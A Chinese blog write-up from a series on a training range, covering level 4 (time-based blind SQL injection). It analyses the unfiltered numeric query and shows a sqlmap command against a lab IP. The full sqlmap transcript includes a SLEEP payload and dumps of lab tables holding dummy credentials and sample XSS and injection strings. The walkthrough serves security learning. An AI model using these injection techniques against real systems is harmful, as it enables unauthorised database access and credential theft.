iwebsec靶场 SQL注入漏洞通关笔记4- sleep注入(时间型盲注)
系列文章目录
iwebsec靶场 SQL注入漏洞通关笔记1- 数字型注入_mooyuan的博客-CSDN博客
iwebsec靶场 SQL注入漏洞通关笔记2- 字符型注入(宽字节注入)_mooyuan的博客-CSDN博客
iwebsec靶场 SQL注入漏洞通关笔记3- bool注入(布尔型盲注)_mooyuan的博客-CSDN博客
目录
系列文章目录
前言
一、源码分析
二、sqlmap注入
1.注入命令
2.完整交互过程
总结
前言
iwebsec靶场的SQL注入漏洞的第04关sleep注入漏洞渗透,
一、源码分析
如下所示,SQL语句为$sql="SELECT * FROM user WHERE id=$id LIMIT 0,1";
可知这是一个普通的数字型注入,并且没有对参数id做任何过滤。不过在输出内容中可以得知仅sql查询成功时输出welcome to iwebsec!!!
而sql语句查询失败时,依旧输出与成功一样的内容welcome to iwebsec!!!
这说明无论sql语句如何,输出结果都是一样的welcome to iwebsec!!! 很明显结合上下文,这就是时间盲注的特点
二、sqlmap注入
1.注入命令
sqlmap -u http://192.168.71.151/sqli/04.php?id=1 --current-db --dump --batch
如下所示,渗透成功
2.完整交互过程
iwebsec的SQL注入第4个时间盲注关卡耗时非常久,大概花了一个多小时左右的时间,完整的注入交互如下所示
kali@kali:~$ sqlmap -u http://192.168.71.151/sqli/04.php?id=1 --current-db --dump --batch _____H__ ___ ___[(]_____ ___ ___ {1.5.11#stable}
|_ -| . ['] | .'| . |
|___|_ [,]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 22:34:10 /2022-11-24/[22:34:10] [INFO] testing connection to the target URL
[22:34:10] [INFO] checking if the target is protected by some kind of WAF/IPS
[22:34:10] [INFO] testing if the target URL content is stable
[22:34:11] [INFO] target URL content is stable
[22:34:11] [INFO] testing if GET parameter 'id' is dynamic
[22:34:11] [WARNING] GET parameter 'id' does not appear to be dynamic
[22:34:11] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[22:34:11] [INFO] testing for SQL injection on GET parameter 'id'
[22:34:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:34:11] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[22:34:11] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:34:11] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[22:34:11] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[22:34:11] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[22:34:11] [INFO] testing 'Generic inline queries'
[22:34:11] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[22:34:11] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[22:34:11] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[22:34:11] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[22:34:21] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[22:34:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:34:21] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:34:22] [INFO] target URL appears to be UNION injectable with 3 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[22:34:22] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[22:34:22] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 106 HTTP(s) requests:
---
Parameter: id (GET)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: id=1 AND (SELECT 3964 FROM (SELECT(SLEEP(5)))Kdwc)
---
[22:34:42] [INFO] the back-end DBMS is MySQL
[22:34:42] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
web server operating system: Linux CentOS 6
web application technology: PHP 5.2.17, Apache 2.2.15
back-end DBMS: MySQL >= 5.0.12
[22:34:42] [INFO] fetching current database
[22:34:42] [INFO] retrieved:
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[22:34:57] [INFO] adjusting time delay to 1 second due to good response times
iwebsec
current database: 'iwebsec'
[22:35:12] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[22:35:12] [INFO] fetching current database
[22:35:12] [INFO] fetching tables for database: 'iwebsec'
[22:35:12] [INFO] fetching number of tables for database 'iwebsec'
[22:35:12] [INFO] retrieved: 4
[22:35:13] [INFO] retrieved: sqli
[22:35:25] [INFO] retrieved: user
[22:35:38] [INFO] retrieved: users
[22:35:45] [INFO] retrieved: xss
[22:35:57] [INFO] fetching columns for table 'users' in database 'iwebsec'
[22:35:57] [INFO] retrieved: 3
[22:36:00] [INFO] retrieved: username
[22:36:23] [INFO] retrieved: password
[22:36:50] [INFO] retrieved: role
[22:37:05] [INFO] fetching entries for table 'users' in database 'iwebsec'
[22:37:05] [INFO] fetching number of entries for table 'users' in database 'iwebsec'
[22:37:05] [INFO] retrieved: 1
[22:37:06] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
mall123mall
[22:37:39] [INFO] retrieved: admin
[22:37:53] [INFO] retrieved: orange
Database: iwebsec
Table: users
[1 entry]
+-------+-------------+----------+
| role | password | username |
+-------+-------------+----------+
| admin | mall123mall | orange |
+-------+-------------+----------+[22:38:11] [INFO] table 'iwebsec.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/users.csv'
[22:38:11] [INFO] fetching columns for table 'xss' in database 'iwebsec'
[22:38:11] [INFO] retrieved: 2
[22:38:14] [INFO] retrieved: id
[22:38:20] [INFO] retrieved: name
[22:38:31] [INFO] fetching entries for table 'xss' in database 'iwebsec'
[22:38:31] [INFO] fetching number of entries for table 'xss' in database 'iwebsec'
[22:38:31] [INFO] retrieved: 5
[22:38:33] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
1
[22:38:35] [INFO] retrieved: iwebsec
[22:38:54] [INFO] retrieved: 5
[22:38:57] [INFO] retrieved: <img src=1 onerror=alert(/ctfs/)/>
[22:40:55] [INFO] retrieved: 6
[22:40:59] [INFO] retrieved: <img src=1 onerror=alert(/ctfs/)/>
[22:42:56] [INFO] retrieved: 7
[22:43:01] [INFO] retrieved: <img src=1 onerror=alert(/ctfs/)/>
[22:44:58] [INFO] retrieved: 8
[22:45:04] [INFO] retrieved: <?php phpinfo();?>
Database: iwebsec
Table: xss
[5 entries]
+----+------------------------------------+
| id | name |
+----+------------------------------------+
| 1 | iwebsec |
| 5 | <img src=1 onerror=alert(/ctfs/)/> |
| 6 | <img src=1 onerror=alert(/ctfs/)/> |
| 7 | <img src=1 onerror=alert(/ctfs/)/> |
| 8 | <?php phpinfo();?> |
+----+------------------------------------+[22:46:22] [INFO] table 'iwebsec.xss' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/xss.csv'
[22:46:22] [INFO] fetching columns for table 'sqli' in database 'iwebsec'
[22:46:22] [INFO] retrieved: 4
[22:46:23] [INFO] retrieved: id
[22:46:29] [INFO] retrieved: username
[22:46:52] [INFO] retrieved: password
[22:47:20] [INFO] retrieved: email
[22:47:33] [INFO] fetching entries for table 'sqli' in database 'iwebsec'
[22:47:33] [INFO] fetching number of entries for table 'sqli' in database 'iwebsec'
[22:47:33] [INFO] retrieved: 7
[22:47:35] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
user1@iwebsec.com
[22:48:27] [INFO] retrieved: 1
[22:48:29] [INFO] retrieved: pass1
[22:48:43] [INFO] retrieved: user1
[22:48:56] [INFO] retrieved: user2@iwebsec.com
[22:49:49] [INFO] retrieved: 2
[22:49:52] [INFO] retrieved: pass2
[22:50:07] [INFO] retrieved: user2
[22:50:22] [INFO] retrieved: user3@iwebsec.com
[22:51:15] [INFO] retrieved: 3
[22:51:18] [INFO] retrieved: pass3
[22:51:34] [INFO] retrieved: user3
[22:51:50] [INFO] retrieved: user4@iwebsec.caom
[22:52:42] [INFO] retrieved: 4
[22:52:46] [INFO] retrieved: admin
[22:53:00] [INFO] retrieved: admin
[22:53:15] [INFO] retrieved: 123@123.com
[22:53:50] [INFO] retrieved: 5
[22:53:53] [INFO] retrieved: 123
[22:54:00] [INFO] retrieved: 123
[22:54:07] [INFO] retrieved: 1234@123.com
[22:54:46] [INFO] retrieved: 6
[22:54:50] [INFO] retrieved: 123
[22:54:57] [INFO] retrieved: ctfs' or updatexml(1,concat(0x7e,(version())),0)#
[22:57:58] [INFO] retrieved: iwebsec02@iwebsec.com
[22:59:04] [INFO] retrieved: 7
[22:59:08] [INFO] retrieved: 123456
[22:59:25] [INFO] retrieved: iwebsec' or updatexml(1,concat(0x7e,(version())),0)#
Database: iwebsec
Table: sqli
[7 entries]
+----+-----------------------+----------+------------------------------------------------------+
| id | email | password | username |
+----+-----------------------+----------+------------------------------------------------------+
| 1 | user1@iwebsec.com | pass1 | user1 |
| 2 | user2@iwebsec.com | pass2 | user2 |
| 3 | user3@iwebsec.com | pass3 | user3 |
| 4 | user4@iwebsec.com | admin | admin |
| 5 | 123@123.com | 123 | 123 |
| 6 | 1234@123.com | 123 | ctfs' or updatexml(1,concat(0x7e,(version())),0)# |
| 7 | iwebsec02@iwebsec.com | 123456 | iwebsec' or updatexml(1,concat(0x7e,(version())),0)# |
+----+-----------------------+----------+------------------------------------------------------+[23:02:31] [INFO] table 'iwebsec.sqli' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/sqli.csv'
[23:02:31] [INFO] fetching columns for table 'user' in database 'iwebsec'
[23:02:31] [INFO] retrieved: 3
[23:02:34] [INFO] retrieved: id
[23:02:40] [INFO] retrieved: username
[23:03:02] [INFO] retrieved: password
[23:03:30] [INFO] fetching entries for table 'user' in database 'iwebsec'
[23:03:30] [INFO] fetching number of entries for table 'user' in database 'iwebsec'
[23:03:30] [INFO] retrieved: 3
[23:03:33] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
1
[23:03:35] [INFO] retrieved: pass1
[23:03:50] [INFO] retrieved: user1
[23:04:03] [INFO] retrieved: 2
[23:04:06] [INFO] retrieved: pass2
[23:04:21] [INFO] retrieved: user2
[23:04:36] [INFO] retrieved: 3
[23:04:39] [INFO] retrieved: pass3
[23:04:55] [INFO] retrieved: user3
Database: iwebsec
Table: user
[3 entries]
+----+----------+----------+
| id | password | username |
+----+----------+----------+
| 1 | pass1 | user1 |
| 2 | pass2 | user2 |
| 3 | pass3 | user3 |
+----+----------+----------+[23:05:10] [INFO] table 'iwebsec.`user`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/user.csv'
[23:05:10] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.71.151'
[23:05:10] [WARNING] your sqlmap version is outdated[*] ending @ 23:05:10 /2022-11-24/
总结
通过源码再来分析下时间盲注关卡重点内容:
(1)闭合方式是什么?iwebsec的第04关关卡为数字型注入,无闭合方式
(2)注入类别是什么?这部分是时间型盲注
(3)是否过滤了关键字?很明显通过源码,iwebsec的时间盲注型关卡无过滤任何信息
了解了如上信息就可以针对性进行SQL渗透,使用sqlmap工具渗透更是事半功倍,以上就是今天要讲的第04关注入内容。时间型盲注相对而言十分耗时,手注或者半自动化注入相对而言操作过程较为麻烦,初学者还是应该以手动与半自动化注入结合方法练习,真正了解原理后可以在使用sqlmap来提升速度
iwebsec靶场 SQL注入漏洞通关笔记4- sleep注入(时间型盲注)相关推荐
- web安全入门之SQL注入-时间型盲注
SQL注入之时间型盲注 1.时间型盲注 时间型盲注条件极为苛刻,不管输入什么,WEB页面回显相同的结果,此时我们无法通过报错型注入以及布尔型盲注来爆数据,此时数据在交互完成以后目标网站没有正确和错误的 ...
- 渗透测试——sql注入进阶/基于时间的盲注/一看就会/
目录 一.注入点判断 注入类型 SQL注入的类型 二.基于时间的时间盲注 什么是时间盲注 sleep()函数 常用函数 三.bWAPP基于时间的盲注实战 一.注入点判断 1.输入一个单引号',因为语句 ...
- SQL注入——基于时间的盲注(九)
本章目的 普及延时盲注技术的运用场景及条件,熟悉length().Substr().ascii().sleep().if()等函数的用法,掌握基于时间的盲注基本流程.PS:面试问答不深问就回答延迟 基 ...
- SQL注入:sqli-labs lesson-8 lesson -9 基于布尔值和基于时间的盲注!
在上一次讲解了lesson -1的sql基本注入,我们在注入的时候,它会返回错误信息 但是盲注不会:什么是盲注:我理解的盲注是,web页面并不会返回错误信息,需要自己添加一些命令来让浏览器进行一些显而 ...
- 注入学习(3) Mysql+php注入 基于bool和时间的盲注
练习三:Mysql+php 基于bool和时间的盲注 今天要用的函数(详细的直接看链接): left()函数:left()得到字符串左部指定个数的字符 left( string, n ) #strin ...
- mysql盲注_Mysql 布尔型盲注手工注入详解
0x00 什么叫布尔型盲注 布尔型 布尔(Boolean)型是计算机里的一种数据类型,只有True(真)和False(假)两个值.一般也称为逻辑型. 盲注 在注入时页面无具体数据返回的注入称之为盲注, ...
- SQL注入漏洞(原理;网页注入)
SQL注入漏洞 一.SQL的注入 SQL注入攻击是黑客对数据库进行攻击的常用手段之一.随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多.但是由于程序员的水平及经验也参差不齐,相 ...
- SQL 注入漏洞(六)布尔型盲注
一.代码分析 在页面中不会显示数据库信息,一般情况下只会显示对与错的内容. 接收 id 的值,直接带入查询,如果存在即返回 users is exists in the database,否则显示 u ...
- MySQL宽字节注入漏洞分析_宽字节注入
概念 单字节字符集: 所有的字符都使用一个字节来表示,比如 ASCII 编码. 多字节字符集: 在多字节字符集中,一部分字节用多个字节来表示,另一部分(可能没有)用单个字节来表示. 两位的多字节字符有 ...
最新文章
- Ubuntu 14.04上安装pip3/numpy/matplotlib/scipy操作步骤
- [HDOJ2845]Beans(dp)
- UA MATH564 概率论 QE练习题3
- mock模拟的数据能增删改查吗_使用Swager API Docs和easy-mock生成模拟数据
- 北京理工大学计算机学院赵曜,北理工学子参加第十届蓝桥杯全国软件和专业人才大赛取得佳绩...
- Scala学习第一篇
- Ubuntu 打开 initramfs
- 七言 感大兴安岭大火
- 给龙芯的OpenJDK8升级
- 简短的计算机病毒,最简单的电脑病毒
- ncbi查找目的基因序列_献给初学者:如何使用 NCBI 查找基因序列、mRNA、Promoter...
- 一行代码生成Love爱心
- 最详细的Quartus + Modesim完整波形仿真过程
- socat使用指南:3:5种常见的使用方法
- STM32——FLASH闪存编程原理与步骤
- 贴片钽电容封装及规格和参数资料
- win7 查看计算机位数,Win7系统电脑操作系统位数的多种查看方法
- “accountsservice:依赖: libaccountsservice0(= 0.6.40-2ubuntu11.3)但是0.6.40-2ubuntu11.6已经安装”解决方法
- Codevs 1066 引水入城 2010年NOIP全国联赛提高组 BFS + 贪心
- Doevents函数详解